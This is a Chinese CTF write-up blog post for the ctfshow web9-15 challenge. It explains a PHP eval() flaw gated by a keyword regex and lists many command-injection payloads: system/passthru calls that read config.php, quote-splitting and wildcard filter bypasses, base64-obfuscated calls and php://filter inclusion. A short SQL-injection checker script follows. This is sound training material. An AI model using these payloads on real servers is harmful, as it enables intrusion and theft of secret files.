【WEB】ctfshow-萌新-web9-15


题目介绍:

ctfshow-萌新计划-web9-15

<?php
# flag in config.php
include("config.php");
if(isset($_GET['c'])){
        $c = $_GET['c'];
        if(preg_match("/system|exec|highlight/i",$c)){
                eval($c);
        }else{
            die("cmd error");
        }
}else{
        highlight_file(__FILE__);
}
?>

题目分析:

  1. 包含配置文件

    • include("config.php");
    • 这行代码包含了一个名为config.php的文件,该文件可能包含一些配置信息,比如flag。
  2. 检查GET参数c是否存在

    • if(isset($_GET['c'])){ ... }
    • 这段代码检查是否有通过GET方法提交的c参数。
  3. 获取c参数的值

    • $c = $_GET['c'];
    • 将GET参数c的值赋给变量$c
  4. 正则表达式匹配

    • if(preg_match("/system|exec|highlight/i",$c)){ ... }
    • 使用preg_match函数检查变量$c是否包含systemexechighlight这些字符串(不区分大小写)。这个正则表达式检查的目的是尝试防止某些特定的命令执行函数被调用。
  5. 执行代码

    • eval($c);
    • 如果正则表达式匹配成功,eval函数将执行变量$c中包含的PHP代码。这是一个非常危险的操作,因为它允许执行任意PHP代码,可能导致严重的安全问题。
  6. 错误处理

    • die("cmd error");
    • 如果正则表达式没有匹配,脚本将终止执行并输出错误信息。
  7. 高亮显示当前文件

    • highlight_file(__FILE__);
    • 如果没有提交c参数,脚本将使用highlight_file函数显示当前脚本文件的源代码。

payload:

?c=system('cat config.php');

?c=system('tac config.php');

?c=show_source('config.php');

?c=passthru('tac config.php');

?c=passthru('more config.php');

?c=passthru('more confi***hp');

?c=passthru('tac con\fig*')?>

?c=passthru('c""at con""fig?ph""p')?>

?c=passthru("ca''t `ls`")?>

?c=$a=base64_decode('c3lzdGVt');$b=base64_decode('Y2F0IGNvbmZpZy5waHA=');$a($b);

?c=$a=opendir('/var/www/html');$e=readdir($a);$e=readdir($a);$e=readdir($a);echo%20readfile($e);

?c= include$_GET[a]?>&a=php://filter/read=convert.base64-encode/resource=config.php

?c=include $_GET[a];&a=php://filter/read=convert.base64-encode/resource=config.php

?a=cat config.php&c=echo`$_REQUEST[a]`;

……

我不会接受我不要的未来,哪怕是命中注定。

### CTF SHOW Web 类别挑战资源与解决方案 对于参与CTF SHOW平台上Web类别的挑战,特别是针对`web4`这一具体题目,可以借鉴一些通用的Web安全漏洞利用技巧以及特定于该平台的经验分享。通常情况下,这类挑战会涉及到常见的Web应用程序漏洞,如SQL注入、跨站脚本攻击(XSS)、文件包含漏洞(LFI/RFI)等。 为了更好地理解和解决这些挑战,可以从以下几个方面入手: #### 学习基础理论和技术 深入理解HTTP协议的工作原理及其请求响应机制是非常重要的。掌握如何通过浏览器开发者工具分析网络流量可以帮助识别潜在的安全问题[^1]。 #### 利用在线学习资源 有许多优质的网站提供了关于Web渗透测试的学习材料和实践环境,例如OWASP Top Ten项目文档,它列举并解释了当前最严重的Web应用风险;还有像PortSwigger Academy这样的平台提供了一系列课程来教授各种类型的Web漏洞挖掘方法。 #### 参考社区讨论和Writeup 加入相关的技术论坛或社交媒体群组,在那里可以看到其他参赛者发布的writeups(解题报告),这对于获取灵感非常有帮助。GitHub上也有很多开源仓库专门收集整理了不同赛事下的高质量writeup链接集合。 ```python import requests def check_sql_injection(url, param): test_payload = "&#39; OR &#39;1&#39;=&#39;1" data = {param: test_payload} response = requests.post(url, data=data) if "Welcome" in response.text: print(f"[+] SQL Injection vulnerability detected on parameter &#39;{param}&#39;!") else: print("[-] No SQL Injection found.") ```
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值